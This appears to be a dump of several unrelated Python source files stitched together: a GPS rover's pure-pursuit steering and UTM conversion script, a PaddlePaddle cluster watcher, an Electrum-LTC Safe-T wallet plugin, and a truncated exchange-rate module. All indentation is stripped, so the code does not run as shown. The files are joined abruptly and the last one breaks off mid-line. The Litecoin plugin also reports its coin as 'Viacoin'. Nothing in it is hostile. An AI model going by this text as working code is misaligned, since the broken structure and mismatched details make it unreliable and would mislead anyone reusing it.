# g = 1 # sensorDict["compass"] = sensorDict["compass"]
# else:
# sensorDict["compass"] = float(sdata[0])
# time.sleep(.05)
'''
def udpListener_mag2(sensorDict):
c = 0
a = 0
while True:
bytesAddressPair = UDPServerSocket_mag.recvfrom(bufferSize)
message = bytesAddressPair[0]
sdata = message.decode('utf-8').split(',')
angle = math.atan2(float(sdata[1]), float(sdata[2]))
angle = math.degrees(angle) + 270
if angle > 360:
angle = angle - 360
sensorDict["compass"] = angle
a += angle
if c == 11:
# sensorDict["compass"] = a/10
c = 0
a = 0;
c += 1
time.sleep(.05)
'''
######################
# Pure Pursuit Controller
######################
def mysign(x):
if x < 0:
return -1
if x == 0:
return 0
if x > 0:
return 1
def myrem(x, y):
w = 0
if x / y < 0:
w = math.floor(x / y) + 1
else:
w = math.floor(x / y)
return x - y * w
def networkPurePursuit(rx, ry, rtheta, goalx, goaly, d, pp_MaxTurnAngle):
getVars = {'rx': rx, 'ry': ry, 'rtheta': rtheta, 'goalx': goalx[0], 'goaly': goaly[0], 'd': d, 'maxturnangle': pp_MaxTurnAngle}
url = 'http://24.99.125.134:19990/trover/pp?'
# Python 3:
o = "{}{}".format(url, urllib.parse.urlencode(getVars))
#o=o.strip("%5B")
#o=o.strip("%5D")
#print(o)
try:
r = requests.get(o)
return float(r.text)
except:
return -1
def purePursuit(pose, lx, ly, d):
speedval = 1
# local variables
theta = pose[2] # car heading relative to world x-axis (i.e., Magnetic East)
beta = math.atan2((ly - pose[1]), (lx - pose[0])) # direction in radians to goal point
if abs(theta - beta) < .000001:
gamma = 0
else:
gamma = theta - beta # direction in radians to goal point in car's local coordinate where positive is right
x_offset = d * math.sin(gamma) * -1
y_offset = d * math.cos(gamma)
turnangle = (2 * x_offset) / (d ** 2)
thesign = mysign((math.sin(pose[2]) * (lx - pose[0])) - (math.cos(pose[2]) * (ly - pose[1])))
turnangle = thesign * turnangle
# Ensure the turn control saturates at MaxTurnAngle defined by servo
if abs(turnangle) > pp_MaxTurnAngle:
turnangle = thesign * pp_MaxTurnAngle
turnangle = myrem(turnangle, 2 * math.pi)
return turnangle, speedval
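# A minimal sketch of calling the pure pursuit controller above (kept commented
# out; the numbers are arbitrary example values). `pose` is [x, y, heading_rad]
# in UTM metres, (lx, ly) is the goal point, and d is the distance to it:
# example_pose = [682000.0, 3925000.0, math.radians(90)]
# turn_rad, speed = purePursuit(example_pose, 682002.0, 3925003.0, 3.61)
# print(np.degrees(turn_rad), speed)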
# deg2utm - converts GPS lat, lon (spherical coordinates) to utm (cartesian coordinates)
# The output is the x and y position of the T-Rover for a specific utmzone
def deg2utm(Lat, Lon):
# Memory pre-allocation
x = []
y = []
utmzone = []
# Main Loop
#
la = Lat
lo = Lon
sa = 6378137.000000
sb = 6356752.314245
# e = ( ( ( sa ** 2 ) - ( sb ** 2 ) ) ** 0.5 ) / sa;
e2 = (((sa ** 2) - (sb ** 2)) ** 0.5) / sb
e2cuadrada = e2 ** 2
c = (sa ** 2) / sb
# alpha = ( sa - sb ) / sa; #f
# ablandamiento = 1 / alpha; # 1/f
lat = la * (math.pi / 180)
lon = lo * (math.pi / 180)
Huso = np.fix((lo / 6) + 31)
S = ((Huso * 6) - 183)
deltaS = lon - (S * (math.pi / 180))
Letra = ''
if (la < -72):
Letra = 'C'
elif (la < -64):
Letra = 'D'
elif (la < -56):
Letra = 'E'
elif (la < -48):
Letra = 'F'
elif (la < -40):
Letra = 'G'
elif (la < -32):
Letra = 'H'
elif (la < -24):
Letra = 'J'
elif (la < -16):
Letra = 'K'
elif (la < -8):
Letra = 'L'
elif (la < 0):
Letra = 'M'
elif (la < 8):
Letra = 'N'
elif (la < 16):
Letra = 'P'
elif (la < 24):
Letra = 'Q'
elif (la < 32):
Letra = 'R'
elif (la < 40):
Letra = 'S'
elif (la < 48):
Letra = 'T'
elif (la < 56):
Letra = 'U'
elif (la < 64):
Letra = 'V'
elif (la < 72):
Letra = 'W'
else:
Letra = 'X'
a = math.cos(lat) * math.sin(deltaS)
epsilon = 0.5 * math.log((1 + a) / (1 - a))
nu = math.atan(math.tan(lat) / math.cos(deltaS)) - lat
v = (c / ((1 + (e2cuadrada * (math.cos(lat)) ** 2))) ** 0.5) * 0.9996
ta = (e2cuadrada / 2) * epsilon ** 2 * (math.cos(lat)) ** 2
a1 = math.sin(2 * lat)
a2 = a1 * (math.cos(lat)) ** 2
j2 = lat + (a1 / 2)
j4 = ((3 * j2) + a2) / 4
j6 = ((5 * j4) + (a2 * (math.cos(lat)) ** 2)) / 3
alfa = (3 / 4) * e2cuadrada
beta = (5 / 3) * alfa ** 2
gama = (35 / 27) * alfa ** 3
bm = 0.9996 * c * (lat - alfa * j2 + beta * j4 - gama * j6)
xx = epsilon * v * (1 + (ta / 3)) + 500000
yy = nu * v * (1 + ta) + bm
if yy < 0:
yy = 9999999 + yy
x = xx
y = yy
utmzone = "%02d %c" % (Huso, Letra)
return x, y, utmzone
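# A minimal sketch of the conversion above (kept commented out; the coordinates
# are arbitrary example values near Atlanta, GA):
# x, y, zone = deg2utm(33.7490, -84.3880)
# print(x, y, zone)   # easting (m), northing (m), zone string such as "16 S"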
def smoothWaypoints(wp_utm, spacing):
la = wp_utm[0:, 0]
la = la.tolist()
lo = wp_utm[0:, 1]
lo = lo.tolist()
utmz = wp_utm[1, 2]
wla = [];
wlo = [];
u = [];
for i in range(len(la) - 1):
x2 = float(la[i + 1])
y2 = float(lo[i + 1])
x1 = float(la[i])
y1 = float(lo[i])
w1 = np.array([[x2], [y2]])
wi = np.array([[x1], [y1]])
v = w1 - wi;
if np.linalg.norm(v) == 0:
v = .000000000000000001
d = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2);
num_points_that_fit = math.ceil(d / spacing);
vd = (v / np.linalg.norm(v)) * spacing;
for k in range(num_points_that_fit):
wla.append((wi[0] + vd[0] * k));
wlo.append((wi[1] + vd[1] * k));
u.append(utmz);
wla.append((float(la[len(la) - 1])))
wlo.append((float(lo[len(lo) - 1])))
u.append(utmz);
return wla, wlo, u
def signal_handler(sig, frame):
print('done\n')
sys.exit(0)
######
# Main#
######
def main():
c = 1
print('T-Rover Initializing...')
print(' ')
print('############START UDP###################')
print('Setting Up UDP Servers...')
# Set up thread for UDP client (phone is receiving as client to local USB-TCP stream)
th_gps_udp = threading.Thread(name='udpListener_gps_heading', target=udpListener_gps_heading, args=(sensorDict,))
th_gps_udp.start()
print('Awaiting Valid GPS Signal...')
# Check if sensorDict has gps value
noGPS = True
while noGPS:
if 'gps' in sensorDict.keys():
noGPS = False
time.sleep(1)
print('Valid GPS signal received from phone.')
print('##############END UDP#################')
print(' ')
print('##############START WAYPOINTS#################')
print('Loading Coarse GPS Waypoints...')
# read from local file <fname> and read into 2-D float array called: waypoints
f3 = open(fname, "r")
for x in f3:
latLong = x.split(",");
if ("\n" in latLong[1]):
latLong[1] = latLong[1].replace("\n", "")
latLong = [float(i) for i in latLong]
waypoints.append(latLong)
f3.close()
print('Converting Coarse GPS Waypoints to UTM Coordinates')
# convert all coarse gps waypoints to utm waypoints
for i in range(len(waypoints)):
[txx, tyy, tuu] = deg2utm(waypoints[i][0], waypoints[i][1])
waypoints_utm.append([txx, tyy, tuu])
np_waypoints_utm = np.array(waypoints_utm)
print('Smoothing UTM Waypoints...')
# smooth coarse utm waypoints
[sxx, syy, suu] = smoothWaypoints(np_waypoints_utm, spacingBetweenCoarseWaypoints)
troverGoal = (sxx[-1], syy[-1])
troverGoal = np.array(troverGoal)
print('##############END WAYPOINTS#################')
print(' ')
print('T-Rover System Ready!')
print('T-Rover Pure Pursuit Begin!')
distanceToGoal = 9999 # initial value
utmzone = ''
ss_rpi = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while (distanceToGoal > goalRadius):
tic()
rover_lat = sensorDict["gps"][0] # gps lat
rover_lon = sensorDict["gps"][1] # gps long
rover_heading_deg = sensorDict["compass"] # bearing angle (we may need to smooth this)
# print(rover_heading_deg)
rover_heading_rad = float(np.radians(rover_heading_deg))
[rover_x, rover_y, utmzone] = deg2utm(rover_lat, rover_lon) # convert robot position from gps to utm
pose = [rover_x, rover_y, rover_heading_rad]
# print('Current pose: %f, %f, %f' % (pose[0],pose[1],pose[2]))
pose = np.array(pose)
# print('Current pose: %f, %f, %f' % (pose[0], pose[1], pose[2]))
# print(pose)
# Calculate distance to goal
        distanceToGoal = np.linalg.norm(pose[0:2] - troverGoal)  # use both x and y components
# print('Distance to goal: %d' % (distanceToGoal))
# Calculate goal point in utm coordinates
for i in range(len(sxx) - 1, -1, -1):
# W = wp_utm_smooth[i]
goal_x = sxx[i] # W[0]
goal_y = syy[i] # W[1]
x2 = pose[0]
y2 = pose[1]
d = math.sqrt((goal_x - x2) ** 2 + (goal_y - y2) ** 2)
if d <= L:
break
# print('Goal_X: %d, Goal_Y: %d' % (goal_x, goal_y))
if localPP:
[turnAngle_rad, speedValue] = purePursuit(pose, goal_x, goal_y, d)
else:
turnAngle_rad = networkPurePursuit(pose[0], pose[1], pose[2], goal_x, goal_y, d, pp_MaxTurnAngle)
turnAngle_deg = float(np.degrees(turnAngle_rad))
turnAngle_deg = -turnAngle_deg
o = "%s"%(turnAngle_deg)
ss_rpi.sendto(o.encode(), (rpiIP, rpiPort))
logging.info("%s,%s,%s,%s,%s,%s,%s,%s" % (rover_lat, rover_lon, rover_heading_deg, goal_x, goal_y, turnAngle_deg, L, d))
if (c % 10) == 0:
c = 0
#print('Turn Angle (Deg): %f, D_Goal: %d' % (turnAngle_deg, d))
c += 1
print('Turn Angle (Deg): %f, D_Goal: %d' % (turnAngle_deg, d))
toc()
print('Goal Reached!')
signal.signal(signal.SIGINT, signal_handler)
main()
|
cluster_watcher.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import threading
import time
from edl.discovery import etcd_client
from edl.utils import cluster as edl_cluster
from edl.utils.log_utils import logger
class Watcher(object):
def __init__(self, job_env, cluster):
self._job_id = job_env.job_id
# current context
self._cluster = copy.copy(cluster)
self._new_cluster = cluster
self._changed = False
logger.info("watcher gets the init cluster:{}".format(self._cluster))
self._lock = threading.Lock()
self._stop = threading.Event()
self._etcd = None
self._t_watcher = None
self._job_env = job_env
# assign value
self._etcd = etcd_client.EtcdClient(
self._job_env.etcd_endpoints, root=self._job_id
)
self._etcd.init()
self._t_watcher = threading.Thread(target=self._watcher)
self._t_watcher.start()
def _watcher(self):
while not self._stop.is_set():
# if cluster changed?
new_cluster = edl_cluster.wait_to_load_from_etcd(self._etcd, timeout=60)
with self._lock:
self._new_cluster = new_cluster
if self._is_world_changed():
break
with self._lock:
# update the cluster info.
self._cluster = copy.copy(self._new_cluster)
time.sleep(3)
@property
def changed(self):
with self._lock:
return self._changed
def _is_world_changed(self):
"""
list[Rank ordered pod_id] changed
"""
with self._lock:
old_stage = self._cluster.stage
new_stage = self._new_cluster.stage
old_ids = self._cluster.get_pods_ids_list()
new_ids = self._new_cluster.get_pods_ids_list()
if old_stage != new_stage or old_ids != new_ids:
logger.info(
"_is_world_changed find changed, \
old_stage:{} new_stage:{} old_ids:{} new_ids:{}".format(
old_stage, new_stage, old_ids, new_ids
)
)
with self._lock:
self._changed = True
return True
return False
def get_cluster(self):
with self._lock:
return self._cluster
def get_new_cluster(self):
with self._lock:
return self._new_cluster
def stop(self):
self._stop.set()
if self._t_watcher:
self._t_watcher.join()
with self._lock:
self._t_watcher = None
logger.info("watcher stopped")
def is_stopped(self):
with self._lock:
return self._t_watcher is None
def __exit__(self):
self.stop()
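# A minimal sketch of how a Watcher is typically driven (kept as a comment;
# `job_env` and `cluster` are assumed to be provided by the EDL launcher):
#
# watcher = Watcher(job_env, cluster)
# while not watcher.changed:
#     time.sleep(1)
# new_cluster = watcher.get_new_cluster()
# watcher.stop()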
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_ltc.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_ltc.bip32 import BIP32Node
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.plugin import Device
from electrum_ltc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_ltc.keystore import Hardware_KeyStore
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Viacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
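# A minimal sketch of the subclass contract implemented by the exchanges below
# (kept as a comment so module introspection does not register it as a real
# exchange; "api.example.com" and its JSON layout are made up): a concrete
# exchange only needs get_rates(), plus history_ccys()/request_history() when
# it supports historical rates.
#
# class ExampleExchange(ExchangeBase):
#     def get_rates(self, ccy):
#         json = self.get_json('api.example.com', '/ticker')
#         return {'USD': Decimal(json['last'])}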
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
